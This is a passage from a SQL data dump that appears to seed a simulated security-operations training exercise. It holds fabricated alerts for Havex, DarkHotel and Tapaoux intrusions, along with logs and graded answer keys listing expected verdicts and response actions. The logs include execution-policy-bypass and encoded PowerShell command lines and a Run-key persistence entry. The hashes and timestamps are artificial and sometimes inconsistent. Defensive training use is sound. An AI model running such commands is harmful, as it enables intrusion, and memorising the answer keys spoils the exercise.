3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(467, 'Execution: \'Havex\' RAT Deployment', 'high', 'Endpoint Detection and Response (EDR)', 'Following the initial access, \'Havex\' RAT is executed to provide attackers with remote control over the compromised systems. The malware was identified running on a critical server, attempting to establish outbound connections to known malicious IPs.', 'Remote Access Trojan', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T15:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\havex.ps1\",\"alert_generated\":true}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers for Havex RAT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attack.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Havex RAT payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"havex.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to execute Havex RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(468, 'Persistence: Registry Modification Identified', 'high', 'Registry Logs', 'The attackers modify registry settings to maintain persistence, ensuring their presence even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"event_id\":4657,\"computer_name\":\"WIN-EXAMPLE\",\"user\":\"malicious_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"operation\":\"SetValue\",\"value_name\":\"SuspiciousProgram\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\malicious\\\\malware.exe\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.42\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample used by attackers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized registry modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"WIN-EXAMPLE\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"operation\\\":\\\"SetValue\\\",\\\"value_name\\\":\\\"SuspiciousProgram\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\malicious\\\\\\\\malware.exe\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.42\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(469, 'Lateral Movement: SMB Traffic Anomaly', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected anomalous SMB traffic consistent with lateral movement activities. Using the \'Havex\' Remote Access Trojan (RAT), attackers are performing network reconnaissance to map the industrial control network. This involves the identification of other critical systems within the network by exploiting the SMB protocol.', 'Network Reconnaissance', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:23:55Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.75\",\"destination_port\":445,\"protocol\":\"SMB\",\"malware_name\":\"Havex\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"john.doe\",\"filename\":\"netmap.exe\",\"external_attacker_ip\":\"203.0.113.45\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical system identified within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with the Havex RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Public IP address related to known malicious activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"netmap.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for network reconnaissance.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(470, 'Exfiltration: Unusual Data Transfer Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The DLP system detected an unusual data transfer from an internal host within the industrial control network to an external IP address. This exfiltration attempt involved sensitive files related to ICS operations, indicating a successful completion of the attackers\' objective.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"internal_ip\":\"192.168.5.23\",\"external_ip\":\"85.234.167.90\",\"filename\":\"ICS_Project_Plan.pdf\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"j.doe\",\"transfer_protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"detection_method\":\"Content Inspection\",\"alert_id\":\"DLP-EXFIL-20231015-001\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the ICS network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"85.234.167.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ICS_Project_Plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive ICS document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"internal\",\"details\":\"Active employee\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"internal_ip\\\":\\\"192.168.5.23\\\",\\\"external_ip\\\":\\\"85.234.167.90\\\",\\\"filename\\\":\\\"ICS_Project_Plan.pdf\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"j.doe\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"150MB\\\",\\\"detection_method\\\":\\\"Content Inspection\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(471, 'Suspicious Wi-Fi Network Activity', 'high', 'Network traffic logs', 'DarkHotel initiated an operation by compromising a hotel\'s Wi-Fi network. The network traffic logs indicate suspicious activity from an external IP address, suggesting an attempt to gain initial access to target devices.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:15Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":443,\"dst_port\":8080,\"protocol\":\"HTTPS\",\"username\":\"guest_user\",\"file\":{\"filename\":\"trojan_hotel.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"action\":\"connection_attempt\",\"result\":\"success\",\"log_id\":\"abcd1234\"}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"This IP is known to be associated with DarkHotel APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DarkHotel trojan.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"trojan_hotel.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Filename is commonly used in DarkHotel campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"internal\",\"details\":\"Default username for hotel guests.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(472, 'Unsigned Software Update Detected', 'high', 'Endpoint security alerts', 'An advanced alert was triggered when a target device attempted to execute a software update lacking a valid signature. This indicates a potential execution of a malicious payload disguised as a legitimate software update.', 'Execution', 'T1204.002 - User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:27:49Z\",\"device_id\":\"WIN-192168011\",\"user\":\"jdoe\",\"filename\":\"update_v1.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_signature_status\":\"unsigned\",\"source_ip\":\"192.168.0.11\",\"destination_ip\":\"45.76.12.34\",\"process_id\":4528,\"execution_path\":\"C:\\\\Program Files\\\\Update\\\\update_v1.exe\",\"alert_message\":\"Unsigned software update executed on endpoint\",\"external_reputation\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.12.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Command and Control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update_v1.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee active in the HR department.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(473, 'Tapaoux Malware Persistence Mechanism', 'high', 'File integrity monitoring', 'The Tapaoux malware employs advanced techniques to maintain persistence, ensuring continued access to the target device despite potential reboots or shutdowns.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"target_ip\":\"10.0.15.21\",\"user\":\"compromised_user\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"Added to startup\",\"registry_key_modified\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TapaouxService\"}', '2026-01-05 03:04:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Tapaoux malware operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the 